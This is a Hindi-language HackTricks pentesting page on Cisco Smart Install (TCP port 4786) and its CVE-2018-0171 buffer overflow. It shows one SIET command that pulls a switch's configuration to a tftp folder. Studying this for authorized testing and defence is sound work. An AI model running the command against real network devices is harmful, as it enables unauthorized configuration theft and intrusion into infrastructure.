4786 - Cisco Smart Install

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Basic Information

Cisco Smart Install एक Cisco द्वारा डिज़ाइन किया गया है जो नए Cisco हार्डवेयर के लिए प्रारंभिक कॉन्फ़िगरेशन और ऑपरेटिंग सिस्टम इमेज को लोड करने की प्रक्रिया को स्वचालित करता है। डिफ़ॉल्ट रूप से, Cisco Smart Install Cisco हार्डवेयर पर सक्रिय है और परिवहन परत प्रोटोकॉल, TCP, का उपयोग करता है, जिसका पोर्ट नंबर 4786 है।

डिफ़ॉल्ट पोर्ट: 4786

PORT      STATE  SERVICE
4786/tcp  open   smart-install

Smart Install Exploitation Tool

2018 में, इस प्रोटोकॉल में एक महत्वपूर्ण सुरक्षा दोष, CVE-2018–0171, पाया गया। खतरे का स्तर CVSS पैमाने पर 9.8 है।

TCP/4786 पोर्ट पर भेजा गया एक विशेष रूप से तैयार किया गया पैकेट, जहां Cisco Smart Install सक्रिय है, एक बफर ओवरफ्लो को ट्रिगर करता है, जिससे एक हमलावर को:

  • डिवाइस को मजबूरन रीबूट करना

  • RCE कॉल करना

  • नेटवर्क उपकरणों की कॉन्फ़िगरेशन चुराना।

यह SIET (Smart Install Exploitation Tool) इस सुरक्षा दोष का लाभ उठाने के लिए विकसित किया गया था, यह आपको Cisco Smart Install का दुरुपयोग करने की अनुमति देता है। इस लेख में मैं आपको दिखाऊंगा कि आप एक वैध नेटवर्क हार्डवेयर कॉन्फ़िगरेशन फ़ाइल कैसे पढ़ सकते हैं। कॉन्फ़िगरेशन का एक्सफिल्ट्रेशन एक पेंटेस्टर के लिए मूल्यवान हो सकता है क्योंकि यह नेटवर्क की अनूठी विशेषताओं के बारे में जानने में मदद करेगा। और इससे जीवन आसान होगा और हमले के लिए नए वेक्टर खोजने की अनुमति देगा।

लक्ष्य डिवाइस एक "लाइव" Cisco Catalyst 2960 स्विच होगा। वर्चुअल इमेज में Cisco Smart Install नहीं होता, इसलिए आप केवल असली हार्डवेयर पर अभ्यास कर सकते हैं।

लक्ष्य स्विच का पता 10.10.100.10 है और CSI सक्रिय है। SIET लोड करें और हमले की शुरुआत करें। -g तर्क डिवाइस से कॉन्फ़िगरेशन का एक्सफिल्ट्रेशन का अर्थ है, -i तर्क आपको कमजोर लक्ष्य का IP पता सेट करने की अनुमति देता है।

~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10

स्विच कॉन्फ़िगरेशन 10.10.100.10 tftp/ फ़ोल्डर में होगा

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

Last updated